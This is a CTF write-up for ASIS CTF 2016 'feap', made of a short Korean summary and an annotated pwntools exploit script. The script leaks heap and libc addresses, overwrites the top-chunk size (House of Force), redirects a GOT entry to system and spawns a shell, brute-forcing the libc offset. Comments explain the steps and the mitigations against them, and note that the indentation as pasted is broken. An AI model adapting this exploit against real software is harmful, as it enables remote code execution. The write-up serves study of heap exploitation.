ASIS CTF 2016 feap


힙쪽에 64바이트 오버플로우. topchunk 덮어서 malloc 조작한뒤 GOT 덮어서 쉘획득.


# ASIS CTF 2016 "feap" exploit script (pwntools, Python 2: note the
# `print x` statements and `.encode('hex')` below).
#
# What the script does, per the author's summary and the code itself:
#   1. leaks a heap pointer and the resolved address of fgets,
#   2. uses the heap overflow in a note body to overwrite the top-chunk
#      size field with -1,
#   3. passes a computed size to malloc so the NEXT allocation is placed at
#      a fixed address in the binary's writable data (TARGET),
#   4. writes libc addresses over that area and triggers a shell.
# The libc distance between fgets and system (DELTA) is not known up front,
# so the whole exchange is retried with DELTA stepped by 0x10 each time.
#
# Defender notes: step 3 relies on malloc trusting the corrupted top-chunk
# size; glibc >= 2.29 aborts with "malloc(): corrupted top size" when the
# top size exceeds the arena's system_mem, and full RELRO (a read-only GOT)
# removes the write target used in step 4.  The fixed 0x6020xx addresses
# used throughout only work because the binary is presumably not PIE.
#
# NOTE(review): the bodies of `while True:` and `try:` have lost their
# indentation in this paste, so the file does not parse as written.
from pwn import *

# pack() reads context.arch: with amd64 it emits 8-byte little-endian words.
context.arch = 'amd64' # i386 / arm


# Guess for (fgets - system) inside the remote libc; refined by the retry
# loop at the bottom (DELTA += 0x10 after every attempt that raises).
DELTA = 0x27be0

# Retry loop: one full exchange with the service per DELTA guess.  There is
# no exit condition of its own; see the note at the bottom.
while True:

print hex(DELTA)

try:

# recvuntil sendline, pack, recv, send

# Remote CTF service (2016); the two commented-out lines below are the
# local-process variant used while developing the script.
r = remote('feap.asis-ctf.ir', 7331)

#r = process(['./feap'])

#raw_input('attach')

# start pwn.


# prepare first heap chunk
# Menu '1' creates a note: size 70, title = one packed 8-byte pointer,
# body 'nah'.  0x6020a8 is labelled "heap address" by the author --
# presumably a global in the binary that holds a heap pointer; verify
# against the binary before trusting that label.

print r.recvuntil('> ')

r.sendline('1')

print r.recvuntil('size: ')

r.sendline('70')

print r.recvuntil('63): ')

r.sendline(pack(0x6020a8)) # heap address

print r.recvuntil('70): ')

r.sendline('nah')


# Menu '5' prints an entry; the bytes between 'Title: ' and '\nBody:' are
# the leak.  Why entry 44 is the one to print is challenge-specific and
# not recoverable from this script.
print r.recvuntil('> ')

r.sendline('5')

print r.recvuntil('print: ')

r.sendline('44')

leak = r.recvuntil('\nBody:').split('Title: ')[1].split('\nBody:')[0]

# The leaked bytes are little-endian: reverse, hex-encode, parse as int.
heap_base = int(leak[::-1].encode('hex'), 16)

# Round down to a 4 KiB boundary; the author treats this as the heap base.
heap_base = heap_base & 0xFFFFF000

print 'heap base : {0}'.format(hex(heap_base))


# Second leak: edit entry 0, pick field '1' (the title, judging by the
# 'title: ' prompt that follows), point it at 0x602048, then print entry
# 44 again to read back the 8-byte word stored at that address.

print r.recvuntil('> ')

r.sendline('3')

print r.recvuntil('edit: ')

r.sendline('0')

print r.recvuntil('body: ')

r.sendline('1')      # heap address

print r.recvuntil('title: ')

r.sendline(pack(0x602048))

print r.recvuntil('> ')

r.sendline('5')

print r.recvuntil('print: ')

r.sendline('44')

leak = r.recvuntil('\nBody:').split('Title: ')[1].split('\nBody:')[0]

# The author identifies this word as the resolved address of fgets, which
# is consistent with 0x602048 being its GOT slot -- confirm on the binary.
fgets = int(leak[::-1].encode('hex'), 16)

print 'fgets : {0}'.format(hex(fgets))


# overwrite topchunk
# Edit entry 0 again, field '2' (the body).  The note was created with
# size 70 but 80 bytes are written: 72 filler bytes followed by 0xFF*8,
# so the size field of the adjacent top chunk reads as -1
# (0xFFFFFFFFFFFFFFFF).  This is the overflow the whole exploit hinges on.

print r.recvuntil('> ')

r.sendline('3')

print r.recvuntil('edit: ')

r.sendline('0')

print r.recvuntil('body: ')

r.sendline('2')

print r.recvuntil('body: ')

r.sendline('\x41'*72 + '\xFF'*8) # overwrite topchunk size to -1


# Steer malloc: with the top-chunk size forced to -1, a request of
# TARGET - heap_base - 0x218 bytes appears intended to move the top chunk
# so that the following allocation starts at TARGET.  The 0x218 is the
# distance from the rounded heap_base to the current top chunk and is
# specific to this binary's allocation sequence.

TARGET = 0x602010

delta = TARGET - heap_base - 0x218

print str(delta)

print r.recvuntil('> ')

r.sendline('1')

print r.recvuntil('size: ')

r.sendline(str(delta))

print r.recvuntil('63): ')

r.sendline('lol')


# Allocate once more: this note's title should now sit at TARGET, so the
# three words written below land on consecutive slots that the author
# labels __libc_start_main, fgets and strtoll (GOT entries, presumably).

print r.recvuntil('> ')

r.sendline('1')

print r.recvuntil('size: ')

r.sendline('70')

print r.recvuntil('63): ')


#system = fgets - 0x27be0 # local

# system is derived from the leaked fgets with the current DELTA guess.
system = fgets - DELTA

payload = 'AAAAAAAA' # libc_start

payload += pack(fgets) # fgets

payload += pack(system) # strtoll

r.sendline(payload)      # title = the three 8-byte words above

print r.recvuntil('70): ')

r.sendline('CCC')


# get shell
# A size is expected here; if the strtoll slot now holds system, parsing
# this string ends up calling system("/bin/sh;") (inferred from the
# author's labels above).

print r.recvuntil('> ')

r.sendline('1')

print r.recvuntil('size: ')

r.sendline('/bin/sh;')


# get shell

r.interactive()


# NOTE(review): a bare `except:` swallows every error, including
# KeyboardInterrupt, and the connection `r` is never closed, so each
# failed attempt leaks a socket.  Catching the specific failure
# (e.g. EOFError) and closing `r` in a `finally` would be cleaner.
except:

pass

# Next guess.  Note the loop also continues after r.interactive() returns;
# it only stops when the script is killed.
DELTA += 0x10


